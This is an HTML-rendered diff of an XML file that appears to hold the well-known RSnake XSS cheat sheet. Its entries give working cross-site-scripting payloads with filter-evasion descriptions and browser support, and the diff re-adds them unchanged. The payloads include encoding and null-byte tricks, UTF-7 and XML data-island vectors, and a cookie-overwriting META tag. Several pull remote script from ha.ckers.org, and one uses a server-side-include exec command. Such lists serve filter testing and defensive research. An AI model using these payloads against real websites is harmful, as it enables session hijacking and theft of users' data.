+ <code><TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></code>
+ <desc>TD background.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML namespace</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><HTML xmlns:xss>
</span><span class="cx" style="display: block; padding: 0 10px"> <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
</span><span class="cx" style="display: block; padding: 0 10px"> <xss:xss>XSS</xss:xss>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</HTML></code>
- <desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML data island w/CDATA</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</HTML></code>
+ <desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML data island w/CDATA</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></code>
- <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML data island w/comment</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></code>
+ <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML data island w/comment</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></code>
- <desc>XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML (locally hosted)</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></code>
+ <desc>XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML (locally hosted)</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></code>
- <desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML HTML+TIME</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></code>
+ <desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XML HTML+TIME</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><HTML><BODY>
</span><span class="cx" style="display: block; padding: 0 10px"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
</span><span class="cx" style="display: block; padding: 0 10px"> <?import namespace="t" implementation="#default#time2">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML></code>
- <desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Commented-out Block</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML></code>
+ <desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Commented-out Block</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><!--[if gte IE 4]>
</span><span class="cx" style="display: block; padding: 0 10px"> <SCRIPT>alert('XSS');</SCRIPT>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<![endif]--></code>
- <desc>Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Cookie Manipulation</name>
- <code><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></code>
- <desc>Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Local .htc file</name>
- <code><XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"></code>
- <desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Rename .js to .jpg</name>
- <code><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code>
- <desc>Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SSI</name>
- <code><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--></code>
- <desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>PHP</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<![endif]--></code>
+ <desc>Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Cookie Manipulation</name>
+ <code><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></code>
+ <desc>Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Local .htc file</name>
+ <code><XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"></code>
+ <desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Rename .js to .jpg</name>
+ <code><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code>
+ <desc>Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SSI</name>
+ <code><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--></code>
+ <desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>PHP</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><? echo('<SCR)';
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-echo('IPT>alert("XSS")</SCRIPT>'); ?></code>
- <desc>PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>JavaScript Includes</name>
- <code><BR SIZE="&{alert('XSS')}"></code>
- <desc>&JavaScript includes (works in Netscape 4.x).</desc>
- <label>Other Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>Character Encoding Example</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+echo('IPT>alert("XSS")</SCRIPT>'); ?></code>
+ <desc>PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>JavaScript Includes</name>
+ <code><BR SIZE="&{alert('XSS')}"></code>
+ <desc>&JavaScript includes (works in Netscape 4.x).</desc>
+ <label>Other Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>Character Encoding Example</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code><
</span><span class="cx" style="display: block; padding: 0 10px"> %3C
</span><span class="cx" style="display: block; padding: 0 10px"> &lt
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -497,480 +497,480 @@
</span><span class="cx" style="display: block; padding: 0 10px"> \x3c
</span><span class="cx" style="display: block; padding: 0 10px"> \x3C
</span><span class="cx" style="display: block; padding: 0 10px"> \u003c
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-\u003C</code>
- <desc>All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Case Insensitive</name>
- <code><IMG SRC=JaVaScRiPt:alert('XSS')></code>
- <desc>Case insensitive XSS attack vector.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>HTML Entities</name>
- <code><IMG SRC=javascript:alert(&quot;XSS&quot;)></code>
- <desc>HTML entities (the semicolons are required for this to work).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Grave Accents</name>
- <code><IMG SRC=`javascript:alert("RSnake says, 'XSS'")`></code>
- <desc>Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Image w/CharCode</name>
- <code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code>
- <desc>If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>UTF-8 Unicode Encoding</name>
- <code><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;></code>
- <desc>UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Long UTF-8 Unicode w/out Semicolons</name>
- <code><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></code>
- <desc>Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV w/Unicode</name>
- <code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></code>
- <desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Hex Encoding w/out Semicolons</name>
- <code><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></code>
- <desc>Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>UTF-7 Encoding</name>
- <code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</code>
- <desc>UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Escaping JavaScript escapes</name>
- <code>\";alert('XSS');//</code>
- <desc>Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>End title tag</name>
- <code></TITLE><SCRIPT>alert("XSS");</SCRIPT></code>
- <desc>This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack.</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/broken up JavaScript</name>
- <code><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></code>
- <desc>STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).</desc>
- <label>Character Encoding Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Tab</name>
- <code><IMG SRC="jav	ascript:alert('XSS');"></code>
- <desc>Embedded tab to break up the cross site scripting attack.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Encoded Tab</name>
- <code><IMG SRC="jav&#x09;ascript:alert('XSS');"></code>
- <desc>Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Newline</name>
- <code><IMG SRC="jav&#x0A;ascript:alert('XSS');"></code>
- <desc>Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Embedded Carriage Return</name>
- <code><IMG SRC="jav&#x0D;ascript:alert('XSS');"></code>
- <desc>Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters).</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Multiline w/Carriage Returns</name>
- <code><IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
</code>
- <desc>Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Null Chars 1</name>
- <code>perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out</code>
- <desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Null Chars 2</name>
- <code>perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out</code>
- <desc>Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Spaces/Meta Chars</name>
- <code><IMG SRC=" &#14; javascript:alert('XSS');"></code>
- <desc>Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal).</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Non-Alpha/Non-Digit</name>
- <code><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
- <desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s"</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Non-Alpha/Non-Digit Part 2</name>
- <code><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></code>
- <desc>Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.</desc>
- <label>Embedded Character Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>No Closing Script Tag</name>
- <code><SCRIPT SRC=http://ha.ckers.org/xss.js</code>
